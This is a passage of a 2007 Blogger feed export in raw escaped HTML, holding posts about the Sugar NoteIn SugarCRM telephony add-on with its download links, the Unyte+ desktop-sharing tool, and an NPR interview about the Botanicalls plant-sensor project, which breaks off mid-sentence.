src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;ADM_unix_1_1_jre1_5_bundle.sh&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;French version : &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/beta2/ADM_unix_1_1_jre1_5_bundle_fr.sh" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;ADM_unix_1_1_jre1_5_bundle_fr.sh&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;configuration Script for Linux client (Fedora). &lt;/p&gt; &lt;pre&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/script_install.sh" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;script_install.sh&lt;/a&gt;&lt;/pre&gt; &lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;strong&gt;Windows version (22 Mo):&lt;/strong&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/ADM_windows_1_1_jre1_5_bundle.exe" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;ADM_windows_1_1_jre1_5_bundle.exe&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;French version : &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/beta2/ADM_windows_1_1_jre1_5_bundle_fr.exe" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;ADM_windows_1_1_jre1_5_bundle_fr.exe&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Mac version :&lt;/strong&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;em&gt;Not available&lt;/em&gt; &lt;/p&gt; &lt;h4&gt;&lt;strong&gt;Server :&lt;/strong&gt;&lt;/h4&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/beta3/EN-version/Sugar_notein_beta2.tar" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;Sugar_NoteIn_beta3.tar&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;French version : &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/beta3/FR-version/Sugar_notein_beta3_fr.tar" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;Sugar_notein_beta3_fr.tar&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/beta2/Sugar_notein_beta2_fr.tar" target="_top" class="download"&gt;&lt;br /&gt;&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;Installation script for Linux/Unix server : &lt;/p&gt; &lt;p class="bodytext"&gt;&lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/install_noteIn.sh" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;install_noteIn.sh&lt;/a&gt; &lt;/p&gt; &lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;View installation guide &lt;a href="http://www.modulis-voip.com/en/products/modulis-voip-applications/sugar-notein/server-installation/#c1371" target="_top" class="internal-link"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/internal_link.gif" alt="" /&gt;here&lt;/a&gt; &lt;/p&gt;&lt;br /&gt;&lt;p class="bodytext"&gt;Patch for file &lt;a href="http://www.modulis-voip.com/fileadmin/uploads/notein/functions.tar" target="_top" class="download"&gt;&lt;img src="http://www.modulis-voip.com/typo3conf/ext/rtehtmlarea/htmlarea/plugins/TYPO3Browsers/img/download.gif" alt="" /&gt;function.php&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p class="bodytext"&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="csc-header csc-header-n1"&gt;&lt;h1 class="csc-firstHeader"&gt;Sugar NoteIn* features :&lt;/h1&gt;&lt;/div&gt;&lt;div class="csc-textpic-text"&gt;&lt;p class="bodytext"&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;Sugar NoteIn* offers you the following features&lt;br /&gt;&lt;br /&gt;&lt;/p&gt; &lt;h4&gt;SugarCRM Popup:&lt;/h4&gt; &lt;p class="bodytext"&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Your contact's detailed profile pops up into your browser when you receive a phone call.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Add quickly a new user and his phone number into sugar CRM when it is an unknown number/a new contact.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Quick access to mails, notes and calls history about your contact when it is calling you.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Choose to disable the popup in one click for all calls, only outbound calls or only internals calls.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Works with tables "Contacts", "leads", "Opportunities" and "Accounts" of sugarCRM. &lt;/li&gt;&lt;/ul&gt;&lt;p class="bodytext"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt; &lt;h4&gt;Quick Note  :&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;Write a quick note about your contact, check his profile and talk to him at the same time.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;The note is automatically added and affected to your selected contact into sugarcrm.&lt;/li&gt;&lt;/ul&gt;&lt;p class="bodytext"&gt;&lt;br /&gt; &lt;/p&gt; &lt;p class="bodytext"&gt;For the moment, Sugar NoteIn* is only available for Unix/Linux and windows operating systems. We hope to have a Mac version soon. &lt;/p&gt; &lt;p class="bodytext"&gt;Modulis products Sugar NoteIn* as a free and open-source solution.The contents Sugar NoteIn* are subject to the GNU GENERAL PUBLIC LICENSE. The Initial Developer of the original code is Michael Mangili-Vincent.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-8597010903225324600?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/8597010903225324600/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=8597010903225324600' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8597010903225324600'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/8597010903225324600'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/note-in.html' title='Note In'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4877024388658064662</id><published>2007-09-17T12:57:00.000-07:00</published><updated>2007-09-17T12:58:07.852-07:00</updated><title type='text'>What is Unyte+™?</title><content type='html'>&lt;h4&gt;&lt;br /&gt;&lt;/h4&gt;   &lt;p&gt;WebDialogs Unyte+ is a quick, easy and secure way to bring people and information together online. Use Unyte+ to show your desktop or share documents and applications with colleagues, friends and family anytime, anywhere. &lt;/p&gt;   &lt;p&gt;An intuitive application, Unyte+ seamlessly integrates with chat, instant messaging and voice solutions allowing seamless escalation from one mode of communication to another. &lt;/p&gt;   &lt;h4&gt;Is Unyte+™ secure?&lt;/h4&gt;   &lt;p&gt;All Unyte+™ communication is 128bit SSL encrypted. Unyte+™ invitation keys are unique and nearly impossible to guess. No access to Unyte+ user’s system could be granted without explicit permission by the user.&lt;/p&gt;      &lt;h4&gt;What is Unyte Lyte?&lt;/h4&gt;   &lt;p&gt;Unyte Lyte is a free plug-in that allows you to conference with one participant and has several of the features available in Unyte+. Included are desktop viewing, SSL encryption, Skype integration, P2P all delivered through a web based application. For a complete comparison, &lt;a href="http://www.unyte.net/products/comparison.php"&gt;click here&lt;/a&gt;.&lt;/p&gt;        &lt;h4&gt;How much does it cost?&lt;/h4&gt;   &lt;p&gt;For the first 30 days you will enjoy all the features of Unyte+ for FREE. This free trial will allow you to meet with four other participants at any time as often as you like. For a list of all the features in Unyte+ &lt;a href="http://www.unyte.net/products/comparison.php"&gt;click here&lt;/a&gt;. &lt;/p&gt;   &lt;p&gt;After 30 days you can choose to purchase a quarterly or annual subscription for Unyte+ or you can simply do nothing and your plug-in will turn into a Unyte Lyte account that you can continue to use at any time as often as you want for FREE. It's your choice, no commitments, no obligations.&lt;/p&gt;   &lt;p&gt;To view a list of Unyte+ subscription options, &lt;a href="http://www.unyte.net/products/unyteplus.php"&gt;click   here&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;h3&gt;Download Unyte+ 2.5&lt;/h3&gt;     &lt;script language="javascript" src="http://www.unyte.net/js/common.js"&gt;&lt;/script&gt;     &lt;script language="javascript"&gt;       WriteButton("http://cache.unyte.net/images/download/btn-left.gif", "http://cache.unyte.net/images/download/btn-right.gif", "http://cache.unyte.net/images/download/btn-bg.gif", "Download", "http://cache.unyte.net/download/Unyte_Setup_25422.exe");     &lt;/script&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 0px;"&gt;&lt;img src="http://cache.unyte.net/images/download/btn-left.gif" /&gt;&lt;/td&gt;&lt;td style="padding: 0px; background-repeat: repeat-x;" background="http://cache.unyte.net/images/download/btn-bg.gif"&gt;&lt;a href="http://cache.unyte.net/download/Unyte_Setup_25422.exe" class="button"&gt;Download&lt;/a&gt;&lt;/td&gt;&lt;td style="padding: 0px;"&gt;&lt;img src="http://cache.unyte.net/images/download/btn-right.gif" /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;       &lt;p&gt;      &lt;small&gt;Release Version: 2.5.4.22; Release Date: August 21, 2007&lt;br /&gt;    File Size: 1.23MB&lt;br /&gt;        &lt;a href="http://feeds.feedburner.com/UnyteNews"&gt;Subscribe for updates &lt;img src="http://cache.unyte.net/images/common/rss.gif" border="0" /&gt;&lt;/a&gt; &lt;/small&gt;    &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4877024388658064662?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4877024388658064662/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4877024388658064662' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4877024388658064662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4877024388658064662'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/what-is-unyte.html' title='What is Unyte+™?'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-3641785896435674768</id><published>2007-09-17T12:52:00.000-07:00</published><updated>2007-09-17T12:56:40.361-07:00</updated><title type='text'>It's Your Plant Again. Pick Up The Phone!</title><content type='html'>&lt;h4&gt;tomado de http://www.npr.org/blogs/talkingplants/2007/07/its_your_plant_again_pick_up_t_1.html&lt;br /&gt;&lt;/h4&gt;                                 &lt;!-- start center column 1--&gt;                                               &lt;p&gt;As promised, here's a Q&amp;amp;A with the co-founder of &lt;a href="mailto:http://www.botanicalls.com/"&gt;Botanicalls&lt;/a&gt;, a not-yet-ready-for-primtime product that enables houseplants to call you on the phone when they need attention. Of course they can't &lt;em&gt;really&lt;/em&gt; call you, but four NYU grad students - among them, &lt;a href="http://flr4.org/klondon/"&gt;Kati London&lt;/a&gt; - have concocted a way to simulate a call. &lt;/p&gt;  &lt;div class="blogInset"&gt;  &lt;div class="photoInfo"&gt;   &lt;img src="http://media.npr.org/blogs/talkingplants/BOTANICALLS-xxsmall.jpg" alt="description" height="175" width="200" /&gt;     &lt;p&gt;Wake Up! Pay Attention! FEED ME!&lt;/p&gt;&lt;p&gt; &lt;span class="rightsnotice"&gt;photo by Sai Sriskandarajah &lt;/span&gt;  &lt;/p&gt;&lt;/div&gt;  &lt;/div&gt;    &lt;p&gt;&lt;br /&gt;KL: Kati London, welcome to TP.  Mind explaining how and your co-horts, hahaha, have gone about giving plants a voice?&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;Kati: We wanted to do things as cheaply as possible, so we created a simple circuit. We start with rudimentary sensors that determine soil moisture levels in a given plant. We add little photocells to determine the plant's light levels. We connect those sensors to a little chip set with thresholds.&lt;/strong&gt;&lt;/p&gt;  &lt;p&gt;KL: Oy. Thresholds?&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;Kati: Yeah, like "I need water but it's not urgent". Or, "Hi, I'm desperately in need of a drink". Or, "Thanks for watering me but now there's water left in my dish. Could you empty it?" &lt;/strong&gt;&lt;/p&gt;  &lt;p&gt;KL: A pain-in-the-ass plant. I love it. Go on. &lt;/p&gt;  &lt;p&gt;&lt;strong&gt;Kati: OK. The little chip is connected to a wireless radio, which is connected to a master radio, which is hooked up to the internet via an ethernet cabl
